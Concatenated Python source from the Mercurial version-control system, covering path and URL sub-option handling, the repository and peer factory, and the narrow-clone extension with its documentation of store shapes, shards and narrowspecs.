        msg = _(b'(paths.%s:pushurl not a URL; ignoring: "%s")\n')
        msg %= (path.name, value)
        ui.warn(msg)
        return None

    # Don't support the #foo syntax in the push URL to declare branch to
    # push.
    if u.fragment:
        ui.warn(
            _(
                b'("#fragment" in paths.%s:pushurl not supported; '
                b'ignoring)\n'
            )
            % path.name
        )
        u.fragment = None

    return bytes(u)


@pathsuboption(b'pushrev', 'pushrev')
def pushrevpathoption(ui, path, value):
    return value


SUPPORTED_BOOKMARKS_MODES = {
    b'default',
    b'mirror',
    b'ignore',
}


@pathsuboption(b'bookmarks.mode', 'bookmarks_mode')
def bookmarks_mode_option(ui, path, value):
    if value not in SUPPORTED_BOOKMARKS_MODES:
        path_name = path.name
        if path_name is None:
            # this is an "anonymous" path, config comes from the global one
            path_name = b'*'
        msg = _(b'(paths.%s:bookmarks.mode has unknown value: "%s")\n')
        msg %= (path_name, value)
        ui.warn(msg)
    if value == b'default':
        value = None
    return value


DELTA_REUSE_POLICIES = {
    b'default': None,
    b'try-base': revlog_constants.DELTA_BASE_REUSE_TRY,
    b'no-reuse': revlog_constants.DELTA_BASE_REUSE_NO,
    b'forced': revlog_constants.DELTA_BASE_REUSE_FORCE,
}
DELTA_REUSE_POLICIES_NAME = dict(i[::-1] for i in DELTA_REUSE_POLICIES.items())


@pathsuboption(
    b'pulled-delta-reuse-policy',
    'delta_reuse_policy',
    display=DELTA_REUSE_POLICIES_NAME.get,
)
def delta_reuse_policy(ui, path, value):
    if value not in DELTA_REUSE_POLICIES:
        path_name = path.name
        if path_name is None:
            # this is an "anonymous" path, config comes from the global one
            path_name = b'*'
        msg = _(
            b'(paths.%s:pulled-delta-reuse-policy has unknown value: "%s")\n'
        )
        msg %= (path_name, value)
        ui.warn(msg)
    return DELTA_REUSE_POLICIES.get(value)


@pathsuboption(b'multi-urls', 'multi_urls', display=display_bool)
def multiurls_pathoption(ui, path, value):
    res = stringutil.parsebool(value)
    if res is None:
        ui.warn(
            _(b'(paths.%s:multi-urls not a boolean; ignoring)\n') % path.name
        )
        res = False
    return res


def _chain_path(base_path, ui, paths):
    """return the result of "path://" logic applied on a given path"""
    new_paths = []
    if base_path.url.scheme != b'path':
        new_paths.append(base_path)
    else:
        assert base_path.url.path is None
        sub_paths = paths.get(base_path.url.host)
        if sub_paths is None:
            m = _(b'cannot use `%s`, "%s" is not a known path')
            m %= (base_path.rawloc, base_path.url.host)
            raise error.Abort(m)
        for subpath in sub_paths:
            path = base_path.copy()
            if subpath.raw_url.scheme == b'path':
                m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
                m %= (path.rawloc, path.url.host)
                raise error.Abort(m)
            path.url = subpath.url
            path.rawloc = subpath.rawloc
            path.loc = subpath.loc
            if path.branch is None:
                path.branch = subpath.branch
            else:
                base = path.rawloc.rsplit(b'#', 1)[0]
                path.rawloc = b'%s#%s' % (base, path.branch)
            suboptions = subpath._all_sub_opts.copy()
            suboptions.update(path._own_sub_opts)
            path._apply_suboptions(ui, suboptions)
            new_paths.append(path)
    return new_paths


class path(int_misc.IPath):
    """Represents an individual path and its configuration."""

    def __init__(
        self,
        ui=None,
        name=None,
        rawloc=None,
        suboptions=None,
        validate_path=True,
    ):
        """Construct a path from its config options.

        ``ui`` is the ``ui`` instance the path is coming from.
        ``name`` is the symbolic name of the path.
        ``rawloc`` is the raw location, as defined in the config.
        ``_pushloc`` is the raw locations pushes should be made to.
                     (see the `get_push_variant` method)

        If ``name`` is not defined, we require that the location be a) a local
        filesystem path with a .hg directory or b) a URL. If not,
        ``ValueError`` is raised.
        """
        if ui is None:
            # used in copy
            assert name is None
            assert rawloc is None
            assert suboptions is None
            return

        if not rawloc:
            raise ValueError(b'rawloc must be defined')

        self.name = name

        # set by path variant to point to their "non-push" version
        self.main_path = None
        self._setup_url(rawloc)

        if validate_path:
            self._validate_path()

        _path, sub_opts = ui.configsuboptions(b'paths', b'*')
        self._own_sub_opts = {}
        if suboptions is not None:
            self._own_sub_opts = suboptions.copy()
            sub_opts.update(suboptions)
        self._all_sub_opts = sub_opts.copy()

        self._apply_suboptions(ui, sub_opts)

    def _setup_url(self, rawloc):
        # Locations may define branches via syntax <base>#<branch>.
        u = url(rawloc)
        branch = None
        if u.fragment:
            branch = u.fragment
            u.fragment = None

        self.url = u
        # the url from the config/command line before dealing with `path://`
        self.raw_url = u.copy()
        self.branch = branch

        self.rawloc = rawloc
        self.loc = b'%s' % u

    def copy(self, new_raw_location: bytes | None = None) -> path:
        """make a copy of this path object

        When `new_raw_location` is set, the new path will point to it.
        This is used by the scheme extension so expand the scheme.
        """
        new = self.__class__()
        for k, v in self.__dict__.items():
            new_copy = getattr(v, 'copy', None)
            if new_copy is not None:
                v = new_copy()
            new.__dict__[k] = v
        if new_raw_location is not None:
            new._setup_url(new_raw_location)
        return new

    @property
    def is_push_variant(self) -> bool:
        """is this a path variant to be used for pushing"""
        return self.main_path is not None

    def get_push_variant(self) -> path:
        """get a "copy" of the path, but suitable for pushing

        This means using the value of the `pushurl` option (if any) as the url.

        The original path is available in the `main_path` attribute.
        """
        if self.main_path:
            return self
        new = self.copy()
        new.main_path = self
        if self._pushloc:
            new._setup_url(self._pushloc)
        return new

    def _validate_path(self):
        # When given a raw location but not a symbolic name, validate the
        # location is valid.
        if (
            not self.name
            and not self.url.scheme
            and not self._isvalidlocalpath(self.loc)
        ):
            raise ValueError(
                b'location is not a URL or path to a local '
                b'repo: %s' % self.rawloc
            )

    def _apply_suboptions(self, ui, sub_options):
        # Now process the sub-options. If a sub-option is registered, its
        # attribute will always be present. The value will be None if there
        # was no valid sub-option.
        for suboption, (attr, func) in _pathsuboptions.items():
            if suboption not in sub_options:
                setattr(self, attr, None)
                continue

            value = func(ui, self, sub_options[suboption])
            setattr(self, attr, value)

    def _isvalidlocalpath(self, path):
        """Returns True if the given path is a potentially valid repository.
        This is its own function so that extensions can change the definition of
        'valid' in this case (like when pulling from a git repo into a hg
        one)."""
        try:
            return os.path.isdir(os.path.join(path, b'.hg'))
        # Python 2 may return TypeError. Python 3, ValueError.
        except (TypeError, ValueError):
            return False

    @property
    def suboptions(self) -> dict[bytes, bytes]:
        """Return sub-options and their values for this path.

        This is intended to be used for presentation purposes.
        """
        d = {}
        for subopt, (attr, _func) in _pathsuboptions.items():
            value = getattr(self, attr)
            if value is not None:
                d[subopt] = value
        return d


def add_branch_revs(
    lrepo: RepoT, other: RepoT | PeerT, branches, revs, remotehidden=False
):
    if hasattr(other, 'peer'):
        # a courtesy to callers using a localrepo for other
        peer: PeerT = other.peer(remotehidden=remotehidden)
    else:
        peer = other
    hashbranch, branches = branches
    if not hashbranch and not branches:
        x = revs or None
        if revs:
            y = revs[0]
        else:
            y = None
        return x, y
    if revs:
        revs = list(revs)
    else:
        revs = []

    if not peer.capable(b'branchmap'):
        if branches:
            raise error.Abort(_(b"remote branch lookup not supported"))
        revs.append(hashbranch)
        return revs, revs[0]

    branchmap = peer.branchmap()

    def primary(branch):
        if branch == b'.':
            if not lrepo:
                raise error.Abort(_(b"dirstate branch not accessible"))
            branch = lrepo.dirstate.branch()
        if branch in branchmap:
            branch_heads = branchmap.branchheads(branch, closed=True)
            revs.extend(hex(r) for r in reversed(branch_heads))
            return True
        else:
            return False

    for branch in branches:
        if not primary(branch):
            raise error.RepoLookupError(_(b"unknown branch '%s'") % branch)
    if hashbranch:
        if not primary(hashbranch):
            revs.append(hashbranch)
    return revs, revs[0]


def decode_b2_caps(blob: bytes) -> Capabilities:
    """decode a bundle2 caps bytes blob into a dictionary

    The blob is a list of capabilities (one per line)
    Capabilities may have values using a line of the form::

        capability=value1,value2,value3

    The values are always a list."""
    caps = {}
    for line in blob.splitlines():
        if not line:
            continue
        if b'=' not in line:
            key, vals = line, ()
        else:
            key, vals = line.split(b'=', 1)
            vals = vals.split(b',')
        key = urlreq.unquote(key)
        vals = [urlreq.unquote(v) for v in vals]
        caps[key] = vals
    return caps


def b2_caps_from_bundle_caps(caps: Collection[bytes]) -> Capabilities:
    """extract bundle2 capabilities from a "bundle-caps" set"""
    b2caps = {}
    for bcaps in caps:
        if bcaps.startswith(b'bundle2='):
            blob = urlreq.unquote(bcaps[len(b'bundle2=') :])
            b2caps.update(decode_b2_caps(blob))
    return b2caps



# repo.factory - class to find and create repository and peers
#
# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import annotations

import os
import stat

from ..i18n import _
from .. import (
    bundlerepo,
    error,
    extensions,
    httppeer,
    localrepo,
    sshpeer,
    statichttprepo,
    unionrepo,
    util,
)
from ..utils import (
    stringutil,
    urlutil,
)


def is_local(repo: bytes) -> bool:
    '''return true if repo (or path pointing to repo) is local'''
    if isinstance(repo, bytes):
        u = urlutil.url(repo)
        scheme = u.scheme or b'file'
        if scheme in peer_schemes:
            cls = peer_schemes[scheme]
            cls.make_peer  # make sure we load the module
        elif scheme in repo_schemes:
            cls = repo_schemes[scheme]
            cls.instance  # make sure we load the module
        else:
            cls = LocalFactory
        if hasattr(cls, 'islocal'):
            return cls.islocal(repo)  # pytype: disable=module-attr
        return False


class LocalFactory:
    """thin wrapper to dispatch between localrepo and bundle repo"""

    @staticmethod
    def islocal(path: bytes) -> bool:
        path = util.expandpath(urlutil.urllocalpath(path))
        return not _isfile(path)

    @staticmethod
    def instance(ui, path, *args, **kwargs):
        path = util.expandpath(urlutil.urllocalpath(path))
        if _isfile(path):
            cls = bundlerepo
        else:
            cls = localrepo
        return cls.instance(ui, path, *args, **kwargs)


# a list of (ui, repo) functions called for wire peer initialization
wirepeersetupfuncs = []


repo_schemes = {
    b'bundle': bundlerepo,
    b'union': unionrepo,
    b'file': LocalFactory,
}

peer_schemes = {
    b'http': httppeer,
    b'https': httppeer,
    b'ssh': sshpeer,
    b'static-http': statichttprepo,
}


def _remoteui(src, opts):
    """build a remote ui from ui or repo and opts"""
    if hasattr(src, 'baseui'):  # looks like a repository
        dst = src.baseui.copy()  # drop repo-specific config
        src = src.ui  # copy target options from repo
    else:  # assume it's a global ui object
        dst = src.copy()  # keep all global options

    # copy ssh-specific options
    for o in b'ssh', b'remotecmd':
        v = opts.get(o) or src.config(b'ui', o)
        if v:
            dst.setconfig(b"ui", o, v, b'copied')

    # copy bundle-specific options
    r = src.config(b'bundle', b'mainreporoot')
    if r:
        dst.setconfig(b'bundle', b'mainreporoot', r, b'copied')

    # copy selected local settings to the remote ui
    for sect in (b'auth', b'hostfingerprints', b'hostsecurity', b'http_proxy'):
        for key, val in src.configitems(sect):
            dst.setconfig(sect, key, val, b'copied')
    v = src.config(b'web', b'cacerts')
    if v:
        dst.setconfig(b'web', b'cacerts', util.expandpath(v), b'copied')

    return dst


@util.rust_tracing_span("repo.factory.repository")
def peer(
    uiorrepo,
    opts,
    path,
    create=False,
    intents=None,
    createopts=None,
    remotehidden=False,
):
    '''return a repository peer for the specified path'''
    ui = getattr(uiorrepo, 'ui', uiorrepo)
    rui = _remoteui(uiorrepo, opts)
    if hasattr(path, 'url'):
        # this is already a urlutil.path object
        peer_path = path
    else:
        peer_path = urlutil.path(ui, None, rawloc=path, validate_path=False)
    scheme = peer_path.url.scheme  # pytype: disable=attribute-error
    if scheme in peer_schemes:
        cls = peer_schemes[scheme]
        peer = cls.make_peer(
            rui,
            peer_path,
            create,
            intents=intents,
            createopts=createopts,
            remotehidden=remotehidden,
        )
        _setup_repo_or_peer(rui, peer)
    else:
        # this is a repository
        repo_path = peer_path.loc  # pytype: disable=attribute-error
        if not repo_path:
            repo_path = peer_path.rawloc  # pytype: disable=attribute-error
        repo = repository(
            rui,
            repo_path,
            create,
            intents=intents,
            createopts=createopts,
        )
        peer = repo.peer(path=peer_path, remotehidden=remotehidden)
    return peer


def _setup_repo_or_peer(ui, obj, presetupfuncs=None):
    ui = getattr(obj, "ui", ui)
    for f in presetupfuncs or []:
        f(ui, obj)
    ui.log(b'extension', b'- executing reposetup hooks\n')
    with util.timedcm('all reposetup') as allreposetupstats:
        for name, module in extensions.extensions(ui):
            ui.log(b'extension', b'  - running reposetup for %s\n', name)
            hook = getattr(module, 'reposetup', None)
            if hook:
                with util.timedcm('reposetup %r', name) as stats:
                    hook(ui, obj)
                msg = b'  > reposetup for %s took %s\n'
                ui.log(b'extension', msg, name, stats)
    ui.log(b'extension', b'> all reposetup took %s\n', allreposetupstats)
    if not obj.local():
        for f in wirepeersetupfuncs:
            f(ui, obj)


@util.rust_tracing_span("repo.factory.repository")
def repository(
    ui,
    path=b'',
    create=False,
    presetupfuncs=None,
    intents=None,
    createopts=None,
):
    """return a repository object for the specified path"""
    scheme = urlutil.url(path).scheme
    if scheme is None:
        scheme = b'file'
    cls = repo_schemes.get(scheme)
    if cls is None:
        if scheme in peer_schemes:
            raise error.Abort(_(b"repository '%s' is not local") % path)
        cls = LocalFactory
    repo = cls.instance(
        ui,
        path,
        create,
        intents=intents,
        createopts=createopts,
    )
    _setup_repo_or_peer(ui, repo, presetupfuncs=presetupfuncs)
    return repo.filtered(b'visible')


def _isfile(path):
    try:
        # we use os.stat() directly here instead of os.path.isfile()
        # because the latter started returning `False` on invalid path
        # exceptions starting in 3.8 and we care about handling
        # invalid paths specially here.
        st = os.stat(path)
    except ValueError as e:
        msg = stringutil.forcebytestr(e)
        raise error.Abort(_(b'invalid path %s: %s') % (path, msg))
    except OSError:
        return False
    else:
        return stat.S_ISREG(st.st_mode)



# __init__.py - narrowhg extension
#
# Copyright 2017 Google, Inc.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""create clones which fetch history data for subsets of files (EXPERIMENTAL)

Only the server holds the full store: narrow clones will have the full history
of fewer files in their store.

Concepts
--------

The narrow extension introduces a number of concepts that are detailed below.

Shape (experimental)
....................

A shape is used to define a set of paths to consider for clients of the narrow
server. And it does so through the entire history, regardless the state of these
files in the heads of the repository (deleted, for example).

As of Mercurial 7.2, only a limited scope of all planned shape-related features
have been implemented. Shapes are only directly interacted with by server
administrators. They can be used to generate narrowspecs (used by clients) and
to create narrow streaming clonebundles.

This means that as of Mercurial 7.2, clients have no knowledge of shapes and
must be given the set of narrow patterns by server administrators in order to
use a streaming clonebundle for a given shape::

    $ hg clone server --narrow --narrowspec NARROW_SPEC_FILE

Fingerprint
...........

Every shape corresponds to a normalized and minimal set of included and excluded
paths in a repository's store. This normalization ensures that we can derive a
fingerprint, meaning that two shapes with the same fingerprint mean they match
the same set of paths.

Checking the fingerprint of a narrow clone can be done by running::

    $ hg admin::narrow-client --store-fingerprint

For now, we guarantee no stability of the fingerprints. Before we take shapes
out of experimental, we will have a fingerprint versioning scheme, to allow
for future changes with no confusion.

Shards
......

Shards are used server-side to slice the store. Each shard is defined as a set
of paths it contains: files or directories matching each path will be included
in that shard. Moreover shards are mutually exclusive, meaning that a given file
can only ever be in one shard and one shard only. When a shard's path matches a
directory, the shard contains all files in that directory's tree, except for
those matched by a more deeply nested shard.

Example
.......

Given the following store, representing all files ever known to the repository::

  .
  ├── file1
  ├── file2
  └── foo
      └── bar
          ├── baz
          │   ├── file1
          │   └── file2
          └── confidential
              ├── confidential-file1
              └── confidential-file2

One could define the following shards::

  * ``foo``, that includes ``foo``
  * ``foo.confidential``, that includes ``foo/bar/confidential``

This would mean that shard ``foo`` contains::

    * ``foo/bar/baz/file1``
    * ``foo/bar/baz/file2``

And shard ``foo.confidential`` contains::

    * ``foo/bar/confidential/confidential-file1``
    * ``foo/bar/confidential/confidential-file2``

In this example, ``file1`` and ``file2`` are not contained in any explicitly
defined shard. As a result, they are contained by the implicit ``base`` shard.

It is important to note that adding a new shard (e.g. that includes `file1` and
``file2``) would remove its paths from any shard that previously contained them
(in this case, only ``base``).

Server-side, shards are used to define shapes, which are sets of shards. Each
shape defines the shards it includes, hence excluding the contents of all other
shards.

To simplify the creation of shapes, we can compose shards together by defining
explicit dependencies between shards. In our above example, we could define a
``foo.full`` (that does not itself have to define any paths), but requires both
``foo`` and ``foo.confidential``, giving us a shard with the full ``foo`` store
subtree.

Note that the set of paths in the current working copy may only be a subset of
the the store. In our example, we can imagine that
``foo/bar/confidential-module`` has been split into the files in
``foo/bar/confidential`` and removed from the working copy.

In addition to the implicit ``base`` shard, there is also the implicit
``.hg-files`` shard, which contains special paths used by Mercurial::

    * ``.hgignore``
    * ``.hgtags``
    * ``.hgsub``
    * ``.hgsubstate``

This shard will be automatically included in every ``Shape`` to make sure
Mercurial has the data it needs to operate on each revision.

Narrowspec (legacy)
...................

Note: the narrowspec in its current form will be phased out in favor of the
``Shape`` system within the next few versions of Mercurial, as of Mercurial 7.2.
See the ``Shapes vs narrowspec`` section below.

The ``narrowspec`` is a client-side configuration that consists of expressions
to match remote files and/or directories that should be pulled
into a client. The ``narrowspec`` has *include* and *exclude* expressions,
with excludes always trumping includes: that is, if a file matches an exclude
expression, it will be excluded even if it also matches an include expression.
Excluding files that were never included has no effect.

Each included or excluded entry is in the format described by
:hg:`help patterns`, but can only use ``path:`` or ``rootfilesin:``, except
when using ``Shard`` and ``Shape`` where you can only use ``path:``.

Shapes vs narrowspec
....................

The ``narrowspec`` was introduced alongside the experimental narrow extension
back in 2018.  It enabled the client to chose exactly what it cares about from
the server, with the server merely cooperating with the patterns that the
client asks for.

Unless this flexibility becomes really important for someone in the future,
the current direction is to deprecate the narrowspec usage and remove its
support entirely in later versions in favor of store shapes.

Here the advantages of store shapes::

  * We can define clonebundles for usual patterns
  * We can nest and generally compose includes and excludes
  * We can generate a fingerprint for equivalent patterns
  * We can require that the server and the client agree on patterns
  * Client are made aware of changes on the server, invalidating their patterns
  * A solid permissions system could be built on top of store shapes
  * Some legacy problems (e.g. CLI parsing) will be solved

Some of these points could be (and have been) bolted on top of the original
implementation, but we would not go very far.

Usage
-----

Server configuration
....................

For Mercurial 7.2, the ``.hg/store/server-shapes`` file is a TOML file, to be
created and modified directly by the narrow server's administrators.

**Warning**: using dedicated ``hg`` command to modify the shapes config will
become mandatory in future releases, once such a command exists,
as changing shapes can lead to (sometimes surprising) client breakage.

The current (experimental!) format is the following::

  * ``version`` (required): its value must be ``0``
  * ``shards`` (required): a list of <shardconfig>
  * <shardconfig>:

    * ``name`` (required): canonical name for this shard.
    * ``paths`` (optional): A list of UTF8 paths that this shard concerns,
        relative to the repo root.
    * ``requires`` (optional): A list of the names of the shards that this
        shard depends on.
    * ``shape`` (optional): If ``true``, this as a user-accessible shape.

Constraints::

  * Shard names must be unique within the config
  * Shard names must only contain bytes that are either lowercase alphanumeric
    ascii, dot or hyphen
  * ``full``, ``base`` and ``.hg-files`` are reserved shard names
  * Each <shardconfig> must define one of ``requires`` or ``paths``, or both
  * Shard requirements cannot form a cycle
  * A given path cannot be in more than one shard
  * ``paths`` must be a list of UTF8 paths. Support for non-UTF8 paths will be
    added in an upcoming version, via an ``encoded_paths`` field
  * ``paths`` must be a list of syntactically valid paths relative to the
    repository root (no ``\\n``, ``\\r`` or ``\\x00``, no consecutive slash, no
    slashes at the start or end, etc.)

Example::

    version = 0

    [[shards]]
    name = "foo"
    paths = ["foo", "bar.txt", "baz/nested"]
    shape = true

    [[shards]]
    name = "subproject1"
    paths = ["subproject1", "utils/only-this-dir"]

    [[shards]]
    name = "backend"
    paths = ["subproject2"]
    requires = ["subproject1"]
    shape = true

    [[shards]]
    name = "full-stack"
    requires = ["backend", "foo"]
    shape = true

Bundle generation
.................

Server administrators manually (and likely frequently) create streaming
clonebundles for every shape and expose them in the server clonebundle manifest
with their fingerprint. In future versions, non-streaming clonebundles will
be supported and their generations more automated.

You may generate the bundles with the following::

  $ hg bundle --all --type"none-v2;stream-v2;shape=my-shape" ../bundle.hg
  $ bundlespec="$(hg debugbundle --spec ../bundle.hg)"
  $ # [move bundle to static server or to `.hg/bundle-cache` for inline serving]
  $ bundleentry="https://static.com/bundle.hg BUNDLESPEC=$bundlespec"
  $ # [or use inline SSH clonebundles]
  $ bundleentry="peer-bundle-cache://bundle.hg BUNDLESPEC=$bundlespec"
  $ echo $bundleentry >> .hg/clonebundles.manifest

You can export the includes and exclude patterns for every shape and give
them manually to clients::

  $ hg admin::narrow-server --shape-narrow-patterns my-shape
  [exclude]
  path:foo
  path:bar

Clients can then use said patterns when doing a narrow stream clone, which
matches the fingerprint from the patterns with that of the server clonebundles::

  $ hg clone --narrow --narrowspec $NARROWSPECFILE

Client
......

TODO explain current client-side config and how it might evolve (storing the
shape, fingerprint, etc.).
"""

from __future__ import annotations

from mercurial import (
    localrepo,
    registrar,
    requirements,
)


from . import (
    narrowbundle2,
    narrowcommands,
    narrowrepo,
    narrowtemplates,
    narrowwirepeer,
)

# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
# be specifying the version(s) of Mercurial they are tested with, or
# leave the attribute unspecified.
testedwith = b'ships-with-hg-core'

configtable = {}
configitem = registrar.configitem(configtable)
# Narrowhg *has* support for serving ellipsis nodes (which are used at
# least by Google's internal server), but that support is pretty
# fragile and has a lot of problems on real-world repositories that
# have complex graph topologies. This could probably be corrected, but
# absent someone needing the full support for ellipsis nodes in
# repositories with merges, it's unlikely this work will get done. As
# of this writining in late 2017, all repositories large enough for
# ellipsis nodes to be a hard requirement also enforce strictly linear
# history for other scaling reasons.
configitem(
    b'experimental',
    b'narrowservebrokenellipses',
    default=False,
    alias=[(b'narrow', b'serveellipses')],
)

# Export the commands table for Mercurial to see.
cmdtable = narrowcommands.table


def featuresetup(ui, features):
    features.add(requirements.NARROW_REQUIREMENT)


def uisetup(ui):
    """Wraps user-facing mercurial commands with narrow-aware versions."""
    localrepo.featuresetupfuncs.add(featuresetup)
    narrowbundle2.setup()
    narrowcommands.setup()
    narrowwirepeer.uisetup()


def reposetup(ui, repo):
    """Wraps local repositories with narrow repo support."""
    if not repo.local():
        return

    repo.ui.setconfig(b'experimental', b'narrow', True, b'narrow-ext')
    if repo.is_narrow:
        narrowrepo.wraprepo(repo)
        narrowwirepeer.reposetup(repo)


templatekeyword = narrowtemplates.templatekeyword
revsetpredicate = narrowtemplates.revsetpredicate
